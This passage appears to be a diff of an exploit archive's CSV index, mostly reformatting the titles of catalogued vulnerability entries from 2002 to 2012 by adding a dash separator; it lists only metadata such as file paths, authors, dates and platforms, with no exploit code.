21952,platforms/windows/dos/21952.c,"Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service (2)",2002-10-22,Trancer,windows,dos,0 21953,platforms/windows/dos/21953.txt,"Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service (3)",2002-10-18,Rapid7,windows,dos,0 21954,platforms/windows/dos/21954.txt,"Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service (4)",2002-10-18,anonymous,windows,dos,0 -21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 Malformed SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0 +21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0 21956,platforms/php/webapps/21956.txt,"KMMail 1.0 E-Mail HTML Injection",2002-10-21,"Ulf Harnhammar",php,webapps,0 21957,platforms/php/webapps/21957.txt,"PHP Arena PAFileDB 1.1.3/2.1.1/3.0 Email To Friend Cross-Site Scripting",2002-10-21,ersatz,php,webapps,0 21958,platforms/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",windows,remote,0 21959,platforms/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",windows,remote,0 -21960,platforms/php/webapps/21960.txt,"gBook 1.4 Administrative Access",2002-10-22,frog,php,webapps,0 -21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 Form_Header.php Cross-Site Scripting",2002-10-23,qber66,php,webapps,0 +21960,platforms/php/webapps/21960.txt,"gBook 1.4 - Administrative Access",2002-10-22,frog,php,webapps,0 +21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 - Form_Header.php Cross-Site Scripting",2002-10-23,qber66,php,webapps,0 21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 Email Form Cross-Site Scripting",2002-10-24,"Daniel Boland",cgi,webapps,0 21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet",2002-10-24,D4rkGr3y,windows,dos,0 21964,platforms/windows/remote/21964.txt,"Solarwinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0 @@ -19244,7 +19244,7 @@ id,file,description,date,author,platform,type,port 21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4_D-Link DI-804 4.68/Dl-704 2.56 b5 Embedded HTTP Server DoS",2002-11-01,"Mark Litchfield",hardware,dos,0 21979,platforms/cgi/webapps/21979.txt,"ION Script 1.4 - Remote File Disclosure",2002-11-01,"Zero X",cgi,webapps,0 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local,0 -21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 Invalid POST Request Denial of Service",2002-11-02,anonymous,windows,dos,0 +21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Request Denial of Service",2002-11-02,anonymous,windows,dos,0 21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0 21983,platforms/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T Information Disclosure",2002-11-04,"Tom Knienieder",hardware,remote,0 21984,platforms/unix/dos/21984.c,"QNX 6.1 TimeCreate Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0 @@ -19257,15 +19257,15 @@ id,file,description,date,author,platform,type,port 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 21993,platforms/php/remote/21993.rb,"AjaXplorer checkInstall.php Remote Command Execution",2012-10-16,Metasploit,php,remote,0 21994,platforms/windows/local/21994.rb,"Windows Escalate Service Permissions Local Privilege Escalation",2012-10-16,Metasploit,windows,local,0 -21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 +21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 21996,platforms/multiple/remote/21996.txt,"Lotus Domino 5.0.8-9 Non-existent NSF Database Banner Information Disclosure",2002-11-07,"Frank Perreault",multiple,remote,0 21997,platforms/windows/remote/21997.txt,"Perception LiteServe 2.0.1 DNS Wildcard Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 21998,platforms/linux/remote/21998.c,"CGIEmail 1.6 - Remote Buffer Overflow",2001-09-11,isox,linux,remote,0 21999,platforms/windows/remote/21999.txt,"Perception LiteServe 2.0.1 - Directory Query String Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 -22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 Admin Interface Cross-Site Scripting",2002-11-08,euronymous,cgi,remote,0 +22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,cgi,remote,0 22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",windows,remote,0 22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 Application Packager Non-Explicit Path Execution",2002-11-08,Texonet,linux,local,0 -22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php album parameter) - SQL Injection",2012-10-16,Zixem,php,webapps,0 +22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - (albums.php album parameter) SQL Injection",2012-10-16,Zixem,php,webapps,0 22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component - (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 22005,platforms/hardware/webapps/22005.txt,"visual tools dvr 3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22006,platforms/windows/dos/22006.txt,"Ezhometech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",windows,dos,0 @@ -19289,11 +19289,11 @@ id,file,description,date,author,platform,type,port 22025,platforms/windows/remote/22025.pl,"TFTPD32 2.50 - Long Filename Buffer Overflow",2002-11-19,"Aviram Jenik",windows,remote,0 22026,platforms/linux/remote/22026.txt,"Mhonarc 2.5.x - Mail Header HTML Injection",2002-11-19,"Steven Christey",linux,remote,0 22027,platforms/windows/remote/22027.txt,"Microsoft Java Virtual Machine 3802 Series - Bytecode Verifier",2002-11-21,"Last Stage of Delirium",windows,remote,0 -22028,platforms/windows/remote/22028.txt,"Symantec Java! JustInTime Compiler 210.65 Command Execution",2002-11-21,"Last Stage of Delirium",windows,remote,0 +22028,platforms/windows/remote/22028.txt,"Symantec Java! JustInTime Compiler 210.65 - Command Execution",2002-11-21,"Last Stage of Delirium",windows,remote,0 22029,platforms/multiple/remote/22029.txt,"Sun/Netscape Java Virtual Machine1.x - Bytecode Verifier",2002-11-21,"Last Stage of Delirium",multiple,remote,0 22030,platforms/php/webapps/22030.php,"VBulletin 2.0/2.2.x - Memberlist.php Cross-Site Scripting",2002-11-22,Sp.IC,php,webapps,0 22031,platforms/unix/dos/22031.txt,"Rational ClearCase 4.1 Portscan Denial of Service",2002-11-22,"Stefan Bagdohn",unix,dos,0 -22032,platforms/windows/remote/22032.txt,"acFTP 1.4 Invalid Password Weak Authentication",2002-11-25,"Matthew Murphy",windows,remote,0 +22032,platforms/windows/remote/22032.txt,"acFTP 1.4 - Invalid Password Weak Authentication",2002-11-25,"Matthew Murphy",windows,remote,0 22033,platforms/linux/dos/22033.txt,"WSMP3 0.0.1/0.0.2 - Multiple Buffer Overflow Vulnerabilities",2002-11-25,"dong-h0un U",linux,dos,0 22034,platforms/linux/remote/22034.pl,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (1)",2002-11-25,"Damian Myerscough",linux,remote,0 22035,platforms/linux/remote/22035.c,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (2)",2002-11-25,Xpl017Elz,linux,remote,0 @@ -19318,8 +19318,8 @@ id,file,description,date,author,platform,type,port 22054,platforms/cgi/remote/22054.c,"Boozt Standard 0.9.8 - index.cgi Buffer Overrun",2002-11-29,BrainStorm,cgi,remote,0 22055,platforms/linux/local/22055.txt,"SuidPerl 5.6 Information Disclosure",2002-11-29,zen-parse,linux,local,0 22056,platforms/linux/dos/22056.txt,"Pserv 2.0 - HTTP Version Specifier Buffer Overflow",2002-11-30,"Matthew Murphy",linux,dos,0 -22057,platforms/linux/remote/22057.pl,"Pserv 2.0 User-Agent HTTP Header Buffer Overflow (1)",2002-11-30,Sapient2003,linux,remote,0 -22058,platforms/linux/remote/22058.c,"Pserv 2.0 User-Agent HTTP Header Buffer Overflow (2)",2002-11-30,jsk,linux,remote,0 +22057,platforms/linux/remote/22057.pl,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (1)",2002-11-30,Sapient2003,linux,remote,0 +22058,platforms/linux/remote/22058.c,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (2)",2002-11-30,jsk,linux,remote,0 22059,platforms/linux/dos/22059.pl,"Pserv 2.0 HTTP Request Parsing Buffer Overflow",2002-11-01,"Matthew Murphy",linux,dos,0 22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos,0 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0 @@ -19327,7 +19327,7 @@ id,file,description,date,author,platform,type,port 22063,platforms/linux/remote/22063.c,"zeroo http server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,linux,remote,0 22064,platforms/linux/remote/22064.pl,"zeroo http server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,linux,remote,0 22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - search.php Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0 -22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 Format String",2002-12-04,"Thomas Wana",linux,local,0 +22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 22069,platforms/multiple/local/22069.py,"Oracle Database Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 @@ -19336,7 +19336,7 @@ id,file,description,date,author,platform,type,port 22074,platforms/osx/dos/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final beta - ViewTopic.php Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta - ViewTopic.php Cross-Site Scripting",2002-11-08,euronymous,php,webapps,0 -22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection",2002-11-09,"Dorin Balanica",php,webapps,0 +22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 - HTML Injection",2002-11-09,"Dorin Balanica",php,webapps,0 22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 @@ -19346,12 +19346,12 @@ id,file,description,date,author,platform,type,port 22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Length Account Compromise",2002-12-16,Andi,unix,remote,0 22085,platforms/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Memory Corruption",2002-12-12,"Stefan Esser",unix,remote,0 22086,platforms/php/webapps/22086.txt,"Mambo Site Server 4.0.11 PHPInfo.php Information Disclosure",2002-12-12,euronymous,php,webapps,0 -22087,platforms/php/webapps/22087.txt,"Mambo Site Server 4.0.11 Path Disclosure",2002-12-12,euronymous,php,webapps,0 +22087,platforms/php/webapps/22087.txt,"Mambo Site Server 4.0.11 - Path Disclosure",2002-12-12,euronymous,php,webapps,0 22088,platforms/php/webapps/22088.txt,"MyPHPSoft MyPHPLinks 2.1.9/2.2 - SQL Injection Administration Bypassing",2002-12-14,frog,php,webapps,0 22089,platforms/php/webapps/22089.txt,"PHP-Nuke 6.0 Web Mail Remote PHP Script Execution",2002-12-16,"Ulf Harnhammar",php,webapps,0 22090,platforms/php/webapps/22090.txt,"PHP-Nuke 6.0 Web Mail Script Injection",2002-12-16,"Ulf Harnhammar",php,webapps,0 -22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 Format String",2002-12-16,"Marceta Milos",linux,remote,0 -22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 Path Traversal",2012-10-19,xistence,multiple,webapps,0 +22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote,0 +22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Path Traversal",2012-10-19,xistence,multiple,webapps,0 22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQLi",2012-10-19,xistence,multiple,remote,0 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQLi (Metasploit)",2012-10-19,xistence,windows,remote,0 22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 - (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 @@ -19361,7 +19361,7 @@ id,file,description,date,author,platform,type,port 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 say() Format String",2002-12-16,"Marceta Milos",linux,remote,0 22102,platforms/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps,0 22103,platforms/php/webapps/22103.txt,"PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2002-12-16,frog,php,webapps,0 -22104,platforms/php/webapps/22104.txt,"Captaris Infinite WebMail 3.61.5 HTML Injection",2002-12-16,"Pedram Amini",php,webapps,0 +22104,platforms/php/webapps/22104.txt,"Captaris Infinite WebMail 3.61.5 - HTML Injection",2002-12-16,"Pedram Amini",php,webapps,0 22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - mmap() Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0 22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,linux,remote,0 22107,platforms/php/webapps/22107.txt,"SPGPartenaires 3.0.1 ident.php SQL Injection",2002-12-20,frog,php,webapps,0 @@ -19374,7 +19374,7 @@ id,file,description,date,author,platform,type,port 22114,platforms/php/webapps/22114.txt,"PEEL 1.0 b - Remote File Inclusion",2002-12-31,frog,php,webapps,0 22115,platforms/php/webapps/22115.txt,"N/X Web Content Management System 2002 Prerelease 1 - menu.inc.php c_path Parameter RFI",2003-01-02,frog,php,webapps,0 22116,platforms/php/webapps/22116.txt,"N/X Web Content Management System 2002 Prerelease 1 - datasets.php c_path Parameter LFI",2003-01-02,frog,php,webapps,0 -22117,platforms/windows/dos/22117.txt,"iCal 3.7 Malformed HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 +22117,platforms/windows/dos/22117.txt,"iCal 3.7 - Malformed HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos,0 22119,platforms/windows/dos/22119.html,"Microsoft PoCket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 22120,platforms/solaris/local/22120.c,"Sun Solaris 2.5.1/2.6/7.0/8/9 Wall Spoofed Message Origin",2003-01-03,"Brant Roman",solaris,local,0 @@ -19408,7 +19408,7 @@ id,file,description,date,author,platform,type,port 22148,platforms/php/webapps/22148.txt,"phpPass 2 AccessControl.php SQL Injection",2003-01-13,frog,php,webapps,0 22149,platforms/php/webapps/22149.txt,"W-Agora 4.1.6 - index.php bn Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 modules.php file Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 -22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 Crash PoC",2012-10-22,coolkaveh,windows,dos,0 +22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 - Crash PoC",2012-10-22,coolkaveh,windows,dos,0 22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en Stored XSS",2012-10-22,sqlhacker,php,webapps,0 22152,platforms/php/webapps/22152.txt,"Joomla Commedia Plugin - (index.php task parameter) SQL Injection",2012-10-22,D4NB4R,php,webapps,0 22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component - (index.php search parameter) SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 @@ -19420,9 +19420,9 @@ id,file,description,date,author,platform,type,port 22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 PORT Overflow",2012-10-23,Metasploit,windows,remote,21 22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 ICMP Packet Flood DoS",2003-01-13,"Pavel P",windows,dos,0 -22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 Profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 +22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 - Profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 22164,platforms/php/webapps/22164.txt,"Geeklog 1.3.7 users.php uid Parameter XSS",2003-01-14,snooq,php,webapps,0 -22165,platforms/php/webapps/22165.txt,"Geeklog 1.3.7 comment.php cid Parameter XSS",2003-01-14,snooq,php,webapps,0 +22165,platforms/php/webapps/22165.txt,"Geeklog 1.3.7 - comment.php cid Parameter XSS",2003-01-14,snooq,php,webapps,0 22166,platforms/php/webapps/22166.txt,"Geeklog 1.3.7 Homepage User Field HTML Injection",2003-01-14,snooq,php,webapps,0 22167,platforms/php/webapps/22167.txt,"vAuthenticate 2.8 - SQL Injection",2003-01-14,frog,php,webapps,0 22168,platforms/php/webapps/22168.txt,"vSignup 2.1 - SQL Injection",2003-01-14,frog,php,webapps,0 @@ -19432,7 +19432,7 @@ id,file,description,date,author,platform,type,port 22172,platforms/windows/dos/22172.txt,"Trend Micro Virus Control System 1.8 - Denial of Service",2003-01-15,"Rod Boron",windows,dos,0 22173,platforms/windows/remote/22173.txt,"Trend Micro Virus Control System 1.8 Information Disclosure",2003-01-15,"Rod Boron",windows,remote,0 22174,platforms/windows/remote/22174.txt,"Trend Micro ScanMail For Exchange 3.8 - Authentication Bypass",2003-01-15,"Rod Boron",windows,remote,0 -22175,platforms/php/webapps/22175.txt,"PHP TopSites 2.0/2.2 HTML Injection",2003-01-15,"Cyberarmy Application",php,webapps,0 +22175,platforms/php/webapps/22175.txt,"PHP TopSites 2.0/2.2 - HTML Injection",2003-01-15,"Cyberarmy Application",php,webapps,0 22176,platforms/php/webapps/22176.txt,"PHP TopSites 2.0/2.2 help.php Cross-Site Scripting",2003-01-15,"Cyberarmy Application",php,webapps,0 22177,platforms/php/webapps/22177.txt,"PHP TopSites 2.0/2.2 edit.php SQL Injection",2003-01-15,"Cyberarmy Application",php,webapps,0 22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0 @@ -19456,9 +19456,9 @@ id,file,description,date,author,platform,type,port 22196,platforms/windows/dos/22196.txt,"Rediff Bol 2.0.2 URL Handling Denial of Service",2003-01-23,"S G Masood",windows,dos,0 22197,platforms/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun",2003-01-24,"USG team",linux,dos,0 22198,platforms/cgi/webapps/22198.txt,"GNU Mailman 2.1 - 'email' Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 -22199,platforms/cgi/webapps/22199.txt,"GNU Mailman 2.1 Error Page Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 -22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0 -22201,platforms/multiple/remote/22201.txt,"List Site Pro 2.0 User Database Delimiter Injection",2003-01-24,Statix,multiple,remote,0 +22199,platforms/cgi/webapps/22199.txt,"GNU Mailman 2.1 - Error Page Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 +22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0 +22201,platforms/multiple/remote/22201.txt,"List Site Pro 2.0 - User Database Delimiter Injection",2003-01-24,Statix,multiple,remote,0 22202,platforms/php/webapps/22202.txt,"FTLS GuestBook 1.1 Script Injection",2003-01-25,BrainRawt,php,webapps,0 22203,platforms/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command Arbitrary File Deletion",2003-01-27,"Wojciech Purczynski",solaris,local,0 22204,platforms/cgi/webapps/22204.txt,"MultiHTML 1.5 - File Disclosure",2000-09-13,"Niels Heinen",cgi,webapps,0 @@ -19471,11 +19471,11 @@ id,file,description,date,author,platform,type,port 22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 Avatar HTML Injection",2003-02-03,delusion,php,webapps,0 22212,platforms/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,linux,local,0 22213,platforms/windows/remote/22213.txt,"Opera 7.0 JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0 -22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 Crash PoC",2012-10-24,coolkaveh,windows,dos,0 -22215,platforms/windows/dos/22215.txt,"Microsoft Office Word 2010 Crash PoC",2012-10-24,coolkaveh,windows,dos,0 +22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash PoC",2012-10-24,coolkaveh,windows,dos,0 +22215,platforms/windows/dos/22215.txt,"Microsoft Office Word 2010 - Crash PoC",2012-10-24,coolkaveh,windows,dos,0 22217,platforms/windows/remote/22217.txt,"Opera 7 Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0 22218,platforms/windows/remote/22218.txt,"Opera 7.0 History Object Information Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 -22219,platforms/windows/remote/22219.txt,"Opera 7.0 Error Message History Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 +22219,platforms/windows/remote/22219.txt,"Opera 7.0 - Error Message History Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 22220,platforms/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0 22221,platforms/windows/dos/22221.pl,"Electrasoft 32Bit FTP 9.49.1 - Client Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0 22222,platforms/php/webapps/22222.txt,"TOPO 1.41 - Remote Path Disclosure",2003-02-04,"Rynho Zeros Web",php,webapps,0 @@ -19493,8 +19493,8 @@ id,file,description,date,author,platform,type,port 22234,platforms/linux/local/22234.c,"Nethack 3 - Local Buffer Overflow (2)",2003-02-10,bob@dtors.net,linux,local,0 22235,platforms/linux/local/22235.pl,"Nethack 3 - Local Buffer Overflow (3)",2003-02-10,tsao@efnet,linux,local,0 22236,platforms/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall File Disclosure",2003-02-10,stickler,hardware,remote,0 -22237,platforms/windows/dos/22237.txt,"Microsoft Office Picture Manager 2010 Crash PoC",2012-10-25,coolkaveh,windows,dos,0 -22239,platforms/windows/dos/22239.txt,"Opera 6.0/7.0 Username URI Warning Dialog Buffer Overflow",2003-02-10,nesumin,windows,dos,0 +22237,platforms/windows/dos/22237.txt,"Microsoft Office Picture Manager 2010 - Crash PoC",2012-10-25,coolkaveh,windows,dos,0 +22239,platforms/windows/dos/22239.txt,"Opera 6.0/7.0 - Username URI Warning Dialog Buffer Overflow",2003-02-10,nesumin,windows,dos,0 22240,platforms/windows/dos/22240.txt,"Opera 6.0/7.0 opera.PluginContext Native Method Denial of Service",2003-01-13,"Marc Schoenefeld",windows,dos,0 22241,platforms/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 22242,platforms/php/webapps/22242.txt,"Cedric Email Reader 0.4 Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 @@ -19507,14 +19507,14 @@ id,file,description,date,author,platform,type,port 22249,platforms/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 libIM Buffer Overflow",2003-02-12,"Euan Briggs",aix,dos,0 22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server Denial of Service",1999-05-08,wh00t,multiple,dos,0 22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4 / SunOS 5 gethostbyname() - Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0 -22252,platforms/php/webapps/22252.txt,"PHP-Board 1.0 User Password Disclosure",2003-02-15,frog,php,webapps,0 -22253,platforms/php/webapps/22253.txt,"DotBr 0.1 System.php3 - Remote Command Execution",2003-02-15,frog,php,webapps,0 -22254,platforms/php/webapps/22254.txt,"DotBr 0.1 Exec.php3 - Remote Command Execution",2003-02-15,frog,php,webapps,0 +22252,platforms/php/webapps/22252.txt,"PHP-Board 1.0 - User Password Disclosure",2003-02-15,frog,php,webapps,0 +22253,platforms/php/webapps/22253.txt,"DotBr 0.1 - System.php3 Remote Command Execution",2003-02-15,frog,php,webapps,0 +22254,platforms/php/webapps/22254.txt,"DotBr 0.1 - Exec.php3 Remote Command Execution",2003-02-15,frog,php,webapps,0 22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 22256,platforms/php/webapps/22256.txt,"D-Forum 1 header Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 22257,platforms/php/webapps/22257.txt,"D-Forum 1 footer Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 22258,platforms/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos,0 -22259,platforms/linux/dos/22259.c,"BitchX 1.0 Malformed RPL_NAMREPLY Denial of Service",2003-01-30,argv,linux,dos,0 +22259,platforms/linux/dos/22259.c,"BitchX 1.0 - Malformed RPL_NAMREPLY Denial of Service",2003-01-30,argv,linux,dos,0 22260,platforms/cgi/webapps/22260.c,"cPanel 5.0 Guestbook.cgi Remote Command Execution (1)",2003-02-19,bob,cgi,webapps,0 22261,platforms/cgi/webapps/22261.pl,"cPanel 5.0 Guestbook.cgi Remote Command Execution (2)",2003-02-19,CaMaLeoN,cgi,webapps,0 22262,platforms/cgi/webapps/22262.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (3)",2003-02-19,SPAX,cgi,webapps,0 @@ -19539,7 +19539,7 @@ id,file,description,date,author,platform,type,port 22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 - dev sendphoto.php File Disclosure",2003-02-24,frog,php,webapps,0 22283,platforms/php/webapps/22283.txt,"CuteNews 0.88 shownews.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22284,platforms/php/webapps/22284.txt,"CuteNews 0.88 - search.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 -22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 comments.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 +22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 - comments.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22286,platforms/unix/dos/22286.html,"Netscape 6.0/7.0 Style Sheet Denial of Service",2003-02-25,Jocke,unix,dos,0 22287,platforms/unix/dos/22287.html,"Netscape 7.0 JavaScript Regular Expression Denial of Service",2003-02-25,dwm,unix,dos,0 22288,platforms/windows/remote/22288.txt,"Microsoft Internet Explorer 5/6 Self Executing HTML 